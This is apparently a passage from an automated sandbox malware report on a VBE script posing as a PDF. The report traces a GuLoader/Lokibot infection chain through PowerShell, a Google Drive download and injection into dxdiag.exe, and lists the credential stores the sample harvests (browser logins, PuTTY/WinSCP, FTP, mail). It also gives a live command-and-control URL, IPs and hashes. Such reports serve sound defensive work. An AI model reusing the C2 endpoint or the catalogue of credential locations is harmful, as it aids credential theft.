                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

                Remote Access Functionality

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		11
                Scripting                		1
                DLL Side-Loading                		1
                Obfuscated Files or Information                		2
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		111
                Process Injection                		1
                Software Packing                		1
                Credentials in Registry                		114
                System Information Discovery                		Remote Desktop Protocol2
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)1
                Timestomp                		Security Account Manager111
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                Virtualization/Sandbox Evasion                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Process Injection                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523160 Sample: PRORA#U010cUNSKA ZAHTEVA 09... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 30 drive.usercontent.google.com 2->30 32 drive.google.com 2->32 40 Multi AV Scanner detection for domain / URL 2->40 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 7 other signatures 2->46 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 48 Writes to foreign memory regions 8->48 50 Found suspicious powershell code related to unpacking or dynamic code loading 8->50 13 dxdiag.exe 1 94 8->13         started        18 conhost.exe 8->18         started        20 msiexec.exe 8->20         started        24 10 other processes 8->24 52 Suspicious powershell command line found 11->52 54 Wscript starts Powershell (via cmd or directly) 11->54 56 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->56 58 Suspicious execution chain found 11->58 22 powershell.exe 14 18 11->22         started        process6 dnsIp7 34 137.184.191.215, 49715, 49716, 49717 PANDGUS United States 13->34 28 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 13->28 dropped 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->60 62 Tries to steal Mail credentials (via file / registry access) 13->62 64 Tries to harvest and steal ftp login credentials 13->64 68 2 other signatures 13->68 36 drive.usercontent.google.com 142.250.184.193, 443, 49705, 49714 GOOGLEUS United States 22->36 38 drive.google.com 142.250.184.238, 443, 49704, 49713 GOOGLEUS United States 22->38 66 Found suspicious powershell code related to unpacking or dynamic code loading 22->66 26 conhost.exe 22->26         started        file8 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe16%ReversingLabsScript.Trojan.Heuristic
                PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe13%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                drive.google.com0%VirustotalBrowse
                drive.usercontent.google.com1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://apis.google.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                https://wordpress.org/documentation/article/faq-troubleshooting/0%VirustotalBrowse
                https://drive.usercontent.google.com/1%VirustotalBrowse
                http://drive.usercontent.google.com1%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                http://137.184.191.215/index.php/check.php?id=115%VirustotalBrowse
                https://drive.usercontent.google.com1%VirustotalBrowse
                https://drive.google.com0%VirustotalBrowse
                https://drive.google.com/-1%VirustotalBrowse
                http://drive.google.com0%VirustotalBrowse
                https://drive.google.com/0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                		142.250.184.238
                		truefalseunknown
                drive.usercontent.google.com
                		142.250.184.193
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/check.php?id=1trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2211216350.000002B428E2D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000002.00000002.2211216350.000002B427C51000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.googPpowershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://wordpress.org/documentation/article/faq-troubleshooting/dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://drive.usercontent.google.com/dxdiag.exe, dxdiag.exe, 00000012.00000003.2523490234.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459489628.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459437875.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://drive.google.compowershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://drive.usercontent.googh8powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://aka.ms/pscore6lBsqpowershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://www.google.compowershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://drive.google.com/dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://contoso.com/powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://drive.google.compowershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://drive.google.com/-dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://apis.google.compowershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.184.193
                      		drive.usercontent.google.comUnited States
                      		15169GOOGLEUSfalse
                      137.184.191.215
                      		unknownUnited States
                      		11003PANDGUStrue
                      142.250.184.238
                      		drive.google.comUnited States
                      		15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523160
                      Start date and time:2024-10-01 07:45:28 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
                      renamed because original name is a hash value
                      Original Sample Name:PRORAUNSKA ZAHTEVA 09-30-2024pdf.vbe
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winVBE@30/10@2/3
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 87%
                      • Number of executed functions: 66
                      • Number of non-executed functions: 11
                      Cookbook Comments:
                      • Found application associated with file extension: .vbe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target dxdiag.exe, PID 2072 because there are no executed function
                      • Execution Graph export aborted for target powershell.exe, PID 3032 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 6412 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      01:46:22API Interceptor91x Sleep call for process: powershell.exe modified
                      01:47:09API Interceptor27x Sleep call for process: dxdiag.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      137.184.191.215Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/10899
                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/039
                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/10899
                      ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/039
                      DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/10899
                      INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check?post=073989953

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      PANDGUSSolicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                      • 155.120.253.229
                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      https://forms.office.com/Pages/ShareFormPage.aspx?id=atlxJ-ZfTkmpiBz5GOrQZra6YH8IF9tJvDnK9FEosBRUNUoySTNMSlhENTkyTjRFS0pYUFBWREJDVS4u&sharetoken=VjI7W44Fh45blPkj2SeDGet hashmaliciousHTMLPhisherBrowse
                      • 137.184.252.128

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eSolicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      Scanned Purchase List.vbsGet hashmaliciousUnknownBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      37f463bf4616ecd445d4a1937da06e19Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      file.exeGet hashmaliciousLodaRATBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      file.exeGet hashmaliciousXWorm, XmrigBrowse
                      • 142.250.184.193
                      • 142.250.184.238
                      Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                      • 142.250.184.193
                      • 142.250.184.238

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Roaming\188E93\31437F.exeSolicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):8003
                        Entropy (8bit):4.840877972214509
                        Encrypted:false
                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                        MD5:106D01F562D751E62B702803895E93E0
                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                        Malicious:false
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:Nlllulbnolz:NllUc
                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                        Malicious:false
                        Preview:@...e................................................@..........

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f21l2rrq.4hp.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phyf1my5.4aa.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpbhzuw5.bia.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
